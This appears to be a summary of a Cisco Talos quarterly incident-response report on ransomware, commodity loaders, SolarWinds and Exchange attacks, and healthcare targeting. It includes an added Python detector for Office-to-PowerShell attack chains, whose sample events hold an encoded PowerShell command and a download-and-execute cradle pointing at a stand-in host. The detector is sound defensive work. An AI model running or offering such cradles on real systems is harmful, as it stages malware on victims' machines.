For the seventh quarter in a row, Cisco Talos Incident Response (CTIR) has observed ransomware dominating the threat landscape. The top variants between November 2020 and January 2021 were Ryuk and Vatet. Cisco Talos has also observed variants of Egregor and WastedLocker continuing to target organizations across the globe.
Unlike the previous quarter, however, these ransomware attacks overwhelmingly relied on phishing emails delivering malicious documents that install commodity trojans such as Zloader, BazarLoader and IcedID. Nearly 70 percent of ransomware attacks in the most recent quarter relied on commodity trojans for initial access. Once inside, adversaries also employed commercially available tools such as Cobalt Strike, open-source post-exploitation tools like Bloodhound, and tools native to the victim's systems, such as PowerShell.
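As an added illustration of the chain described above (this is not code from the Talos report), the following Python flags process-creation events in which an Office application spawns a script interpreter, or PowerShell runs with an encoded command, a download cradle or a hidden window, the behaviours a macro-laden attachment typically shows while staging a loader. The field names assume a Sysmon-like schema, and the sample events are constructed.

```python
"""Flag process-creation events that look like the maldoc-to-PowerShell chain.

Added illustration; the events below are constructed, not from the Talos report.
Field names (parent_image, image, command_line) are an assumed, Sysmon-like schema.
"""
import re

# Office binaries that a macro-laden attachment would run inside.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and LOLBins a macro typically spawns to stage the loader.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}

# -e/-ec/-enc/-EncodedCommand as a standalone switch (so -ExecutionPolicy does not match).
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)(?:\s|$)", re.IGNORECASE)
# Common download / decode cradles seen in loader one-liners.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|FromBase64String",
    re.IGNORECASE)
HIDDEN_RE = re.compile(r"(?:^|\s)-(?:w|win|window|windowstyle)\s+hidden", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> list[str]:
    """Return the list of suspicious traits for one process-creation event."""
    reasons = []
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")

    if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
        reasons.append(f"office parent {parent} spawned {image}")

    # "cmd.exe /c powershell ..." is the same chain one hop longer, so inspect the
    # command line whenever PowerShell appears in it, not only when it is the image.
    if image in PS_IMAGES or "powershell" in cmd.lower():
        if ENCODED_RE.search(cmd):
            reasons.append("encoded PowerShell command")
        if CRADLE_RE.search(cmd):
            reasons.append("download or decode cradle in command line")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden window")
    return reasons


def detect(events) -> dict[str, list[str]]:
    """Map event id -> reasons for every event that triggers at least one rule."""
    hits = {}
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


# Constructed sample events (invented hosts, paths and payload; the base64 is a placeholder).
SAMPLE_EVENTS = [
    {"id": "evt-1",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"id": "evt-2",  # user simply opens an attachment: no rule should fire
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"id": "evt-3",  # legitimate scheduled admin script: no rule should fire
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"id": "evt-4",  # macro goes through cmd.exe first
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://stage.example.invalid/a')\""},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(reasons))
```

The parent/child rule carries most of the signal: evt-3 is a scheduled PowerShell job with an execution-policy override, which the command-line checks deliberately leave alone, while evt-4 shows why the cradle and window checks must look at the whole command line rather than only at processes whose image is powershell.exe.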
“Ransomware continues to be a challenging cyberthreat across industries. In the case of commodity trojans, we are referring to attacks which can be bought and sold for quick yet effective results. In some cases, commodity trojans are even made free to download. Via simple phishing emails, actors are able to infiltrate networks, gather intelligence and ultimately, cause long-term damage,” said Fady Younes, Cybersecurity Director, Middle East and Africa, Cisco.
“It is important to note that these packaged cybercrime tools are not only readily available, but are also easy for even the less experienced attacker to deploy. Organizations must therefore seek to constantly educate their workforces on how to identify suspicious emails and raise red flags. Decision-makers are also responsible for effectively securing IT systems with cybersecurity measures, such as thorough patching and endpoint protection – creating the ultimate line of defense.”
CTIR also engaged in several incident response engagements in which organizations unknowingly downloaded trojanized updates to the widely deployed SolarWinds’ Orion software. Only one of these engagements involved post-compromise activity.
Subsequently, Microsoft disclosed four vulnerabilities in Exchange Server and revealed that a threat actor it tracks as Hafnium had been exploiting them to drop web shells on an array of organizations. Other threat actors, ranging from APTs to cryptominer groups, soon began leveraging the same exploits, with affected organizations estimated in the tens of thousands. CTIR has been responding to a growing number of incidents involving these Exchange vulnerabilities.
Actors targeted a broad range of verticals, including business management, construction, education, energy and utilities, entertainment, financial, government, healthcare, industrial distribution, legal, manufacturing and technology.
Adversaries most often targeted the healthcare sector, which partly explains the increase in Vatet activity, as Vatet has been known to target healthcare organizations. CTIR identified a potential pattern in which a hospital in a given state is attacked first and the regional hospitals associated with it serve as follow-on targets, particularly if they have active VPN connections to the affected organization. There are many reasons why actors continue to target the healthcare industry, including the COVID-19 pandemic, which gives victims a strong incentive to pay in order to restore services as quickly as possible.